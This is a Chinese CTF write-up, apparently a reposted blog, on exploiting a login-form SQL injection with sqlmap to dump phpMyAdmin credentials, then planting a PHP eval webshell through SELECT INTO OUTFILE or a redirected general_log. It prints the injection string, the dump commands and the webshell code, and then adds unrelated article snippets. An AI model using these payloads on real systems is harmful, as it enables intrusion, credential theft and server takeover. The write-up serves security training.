一道sql注入的ctf题目致使用phpmyadmin上传 webshell 拿后台权限

以下均为靶场测试环境渗透,非正式环境。

遇见登录框,直接万能密码’or(1=1)or’/1 直接登录成功并返回结果:
在这里插入图片描述
既然存在sql注入,那就用sqlmap跑一下吧:
输出所有的数据库:

sqlmap -u <目标URL> --dbs

要输出数据库中的表,你可以使用 SQLMap 的 --tables 选项。以下是一个示例命令:

sqlmap -u <目标URL> -D <数据库名称> --tables

如果你想要进一步获取某个表的数据,可以使用 --dump 选项。例如:

sqlmap -u http://example.com/index.php?id=1 -D exampledb -T users --dump

跑了一堆杂货,于是我又去跑了目录,发现有http://c63d6b5a18c915cb.node.nsctf.cn/phpmyadmin/index.php,还以为上面的东西就是账号和密码,白高兴一场。
最后这道题目我放了几天没管,后来杰哥说他很快就跑出来了,我又把这道题拿出来看,然后还是不行,他告诉我应该加个参数:

python sqlmap.py -r 1.txt --risk 3 --batch --dbs
python sqlmap.py -r 1.txt --risk 3 --batch -D phpmyadmin --tables
python sqlmap.py -r 1.txt --risk 3 --batch -D phpmyadmin -T pma__users --dump

于是变成了这样子,然后我抛出所有的库,在库里面找到一个比较可疑的库,然后跑所有的表,找了一个可能包含用户名密码的表,抛出里面的内容,我发现确实很快,那为什么之前一直那么慢呢?我试了试其实和之前相比没有快多少,之前的错误之处是因为我找到了一个库,跑里面的所有库,所以导致非常慢,下次再跑这种东西的时候,我就一个表一个表跑,最后就跑出来账号和密码成功登录phpmyadmin服务器:
在这里插入图片描述
注意到:
在这里插入图片描述
可以在提权前阅读以下这篇好文:
windows系统:https://www.freebuf.com/column/173672.html
linux系统:https://www.cnblogs.com/liliyuanshangcao/p/13815242.html

先爆数据库安装路径:
在这里插入图片描述
在这里插入图片描述

2、利用日志文件或备份文件来写入一句话
日志文件
1、开启日志
set global general_log = “ON”;
在这里插入图片描述
2. 修改日志文件保存的位置
在这里插入图片描述
写入一句话木马:
在这里插入图片描述
在这里插入图片描述
但是显示不行:
在这里插入图片描述

从这里开始讲解我最后是咋做的,来让我们一起来捋捋整个过程:
首先网上说要获取网站根目录,我哪里知道根目录啊,各种报错,探针都试了一遍,遂放弃。有两种思路,一种是写入一句话木马,另一种是修改日志文件的位置,然后通过select木马写入日志文件进行解析:
我们必须提前检测一下“secure_file_priv”的值,命令SHOW VARIABLES LIKE "secure_file_priv";
可以看到值是多少,secure_file_priv 有三种状态

secure_file_priv 为 NULL 时,表示不允许导入导出;
secure_file_priv 为 指定文件夹 时,表示 mysql 的导入导出只能在指定的文件夹;
secure_file_priv 没有设置时,则表示没有任何限制;

而我此时只看到我执行的sql是第二种情况,结果是/var/www/html/upload,说明网站根目录极有可能在/var/www/html,我就把我的木马文件写入到了它指定的文件夹下,反正其他地方也写不了,于是命令:select '<?php @eval($_POST[shell]);?>' into outfile '/var/www/html/upload/shell.php'; 很幸运,可以直接写入被解析,直接上蚁剑连接:
在这里插入图片描述
如果你没有像我这么幸运,你可以尝试修改日志文件,也就是当你面对让你插入文件的地方你插不了,或者上面命令返回的是NULL的时候,你可以再咬牙坚持以下:
在这里插入图片描述
如果还不行:
我们需要检测的是MySQL全局变量(general_log、general_log file)的值。
general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
general log file 指的是日志的保存路径。

set global general_log = "ON";
SET global general_log_file='网站根目录/infos.php';

写入木马:

select ‘<?php @eval($_POST[shell]);?>’ ;

你可以尝试连接以下看看可不可以,再不可以,你可以先放弃。

最后
乘着空闲时间做了ctfshow的web入门题目,做一个小总结:
一,查看源代码的方式:
3. url前加入view-source: 查看源代码。 view-source:url
4. crtl+u 也可以查看源代码
5. PHPS文件泄露,phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。因为用户无法直接通 过Web浏览器“看到”php文件的内容,所以需要用phps文件代替。用户访问phps文件就能看到对应的php文件的源码。
6. 查询域名解析地址 基本格式:nslookup host [server],查询域名的指定解析类型的解析记录 基本格式:nslookup -type=type host [server],查询全部 基本格式:nslookup -query=any host [server]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/250244.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

docker中三种常用的持久化数据的方式

文章目录 介绍1.docker run -v2.volumes3.bind mounts 介绍 “前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到网站。” 在Docker中&#xff0c;有以下三种常用的持久化数据的方式&#xff0c;可…

Kotlin快速入门系列10

Kotlin的委托 委托模式是常见的设计模式之一。在委托模式中&#xff0c;有两个对象参与处理同一个请求&#xff0c;接受请求的对象将请求委托给另一个对象来处理。与Java一样&#xff0c;Kotlin也支持委托模式&#xff0c;通过关键字by。 类委托 类的委托即一个类中定义的方…

2024美赛数学建模A题思路分析 - 资源可用性和性别比例

1 赛题 问题A&#xff1a;资源可用性和性别比例 虽然一些动物物种存在于通常的雄性或雌性性别之外&#xff0c;但大多数物种实质上是雄性或雌性。虽然许多物种在出生时的性别比例为1&#xff1a;1&#xff0c;但其他物种的性别比例并不均匀。这被称为适应性性别比例的变化。例…

【Javaweb程序】【C00155】基于SSM的旅游旅行管理系统(论文+PPT)

基于SSM的旅游旅行管理系统&#xff08;论文PPT&#xff09; 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于SSM的旅游旅行管理系统 本系统分为前台系统模块、管理员模块、用户模块以及商家模块 其中前台系统模块的权限为&#xff1a;当游客打开系统的网址后…

C++ 数论相关题目 博弈论:拆分-Nim游戏

给定 n 堆石子&#xff0c;两位玩家轮流操作&#xff0c;每次操作可以取走其中的一堆石子&#xff0c;然后放入两堆规模更小的石子&#xff08;新堆规模可以为 0 &#xff0c;且两个新堆的石子总数可以大于取走的那堆石子数&#xff09;&#xff0c;最后无法进行操作的人视为失…

Scrum敏捷开发企业培训-敏捷研发管理

课程简介 Scrum是目前运用最为广泛的敏捷开发方法&#xff0c;是一个轻量级的项目管理和产品研发管理框架。 这是一个两天的实训课程&#xff0c;面向研发管理者、项目经理、产品经理、研发团队等&#xff0c;旨在帮助学员全面系统地学习Scrum和敏捷开发, 帮助企业快速启动敏…

带libc源码gdb动态调试(导入glibc库使得可执行文件动态调试时可看见调用库函数源码)

文章目录 参考部分查看源码是否编译时有-g调试信息和符号表在 gdb 中加载 debug 文件/符号表将 debug 文件放入 ".debug" 文件夹通过 gdb 命令 set debug-file-directory directories GCC的gcc和g区别指定gcc/g&#xff0c;glibc的版本进行编译指定gcc/g的版本指定gl…

bash脚本学习笔记

一、扫盲 脚本文件是一种文本文件&#xff0c;其中包含了一系列的命令和指令&#xff0c;可以被操作系统解释器直接解释执行。脚本文件通常被用来完成特定的任务或执行重复性的操作。 脚本文件通常以某种编程语言的语法编写&#xff0c;例如 Bash、Python、Perl、Ruby 等等。…

Vue Router

Vue Router 一、Vue Router 回顾 1、路由简介 路由是一个比较广义和抽象的概念&#xff0c;路由的本质就是对应关系。 在开发中&#xff0c;路由分为&#xff1a; ​ 后端路由​ 前端路由 后端路由 概念&#xff1a;根据不同的用户 URL 请求&#xff0c;返回不同的内容本…

k8s中调整Pod数量限制的方法

一、介绍 Kubernetes节点每个默认允许最多创建110个pod&#xff0c;有时可能由于主机配置扩容的问题&#xff0c;从而需要修改节点pod运行数量的限制。 即&#xff1a;需要调整Node节点的最大可运行Pod数量。 一般来说&#xff0c;只需要在kubelet启动命令中增加–max-pods参数…

MySQL进阶之锁(全局锁以及备份报错解决)

锁 全局锁 全局锁就是对整个数据库实例加锁&#xff0c;加锁后整个实例就处于只读状态&#xff0c;后续的DML的写语句&#xff0c;DDL语 句&#xff0c;已经更新操作的事务提交语句都将被阻塞。 其典型的使用场景是做全库的逻辑备份&#xff0c;对所有的表进行锁定&#xff…

Java 基于 SpringBoot+Vue 的考研论坛管理系统

博主介绍&#xff1a;✌程序员徐师兄、7年大厂程序员经历。全网粉丝12W、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ &#x1f345;文末获取源码联系&#x1f345; &#x1f447;&#x1f3fb; 精彩专栏推荐订阅&#x1f447;…

在PostgreSQL中不开归档?恭喜你!锅你背定了

&#x1f4e2;&#x1f4e2;&#x1f4e2;&#x1f4e3;&#x1f4e3;&#x1f4e3; 哈喽&#xff01;大家好&#xff0c;我是【IT邦德】&#xff0c;江湖人称jeames007&#xff0c;10余年DBA及大数据工作经验 一位上进心十足的【大数据领域博主】&#xff01;&#x1f61c;&am…

微信小程序~上推加载更多组件

本组件使用的是TaroReact 实现的 &#xff0c;具体代码如下 一共分为tsx和less文件 //index.tsx /** RefreshLoading* description 上推加载更多组件* param loading boolean* param style* returns*/import { View } from "tarojs/components"; import React, { FC…

深入解剖指针篇(3)

个人主页&#xff08;找往期文章&#xff09; &#xff1a;我要学编程(ಥ_ಥ)-CSDN博客 目录 二级指针 指针数组 指针数组模拟二维数组 字符指针变量 数组指针 数组指针初始化 二维数组传参的本质 函数指针 函数指针的使用 typedef关键字 函数指针数组 二级指针…

U盘文件管理,禁止拷贝文件到U盘的解决办法

在许多企业和组织中&#xff0c;为了防止敏感数据的泄露和保护计算机系统的安全&#xff0c;通常会采取一些措施来限制员工拷贝文件到U盘的行为。然而&#xff0c;有些员工可能会试图绕过这些限制&#xff0c;导致数据安全风险增加。 案例 2015年5月&#xff0c;隶属于某县政府…

【yaml 文件使用】pytest+request 框架中 yaml 配置文件使用

又来进步一点点~~ 背景&#xff1a;最近在学习pytestrequest框架写接口测试自动化&#xff0c;使用yaml文件配置更方便管理用例中的数据&#xff0c;这样更方便 yaml 介绍&#xff1a; 什么是 yaml 文件&#xff1a;YAML 是 “YAML Ain’t a Markup Language”&#xff08;Y…

Android 系统启动流程

依旧是带着问题再去学习 首先&#xff0c;Android是怎么启动的&#xff1f; Android服务是怎么启动的&#xff1f; Android线程是怎么切换的&#xff1f; Android ApplicationThread是怎么创建的&#xff1f; 那么接下来开始分析Android的启动流程 还是一步一图 先画一张流…

jenkins pipeline配置maven可选参数

1、在Manage Jenkins下的Global Tool Configuration下对应的maven项添加我们要用得到的不同版本的maven安装项 2、pipeline文件内容具体如下 我们maven是单一的&#xff0c;所以我们都是配置单选参数 pipeline {agent anyparameters {gitParameter(name: BRANCH_TAG, type: …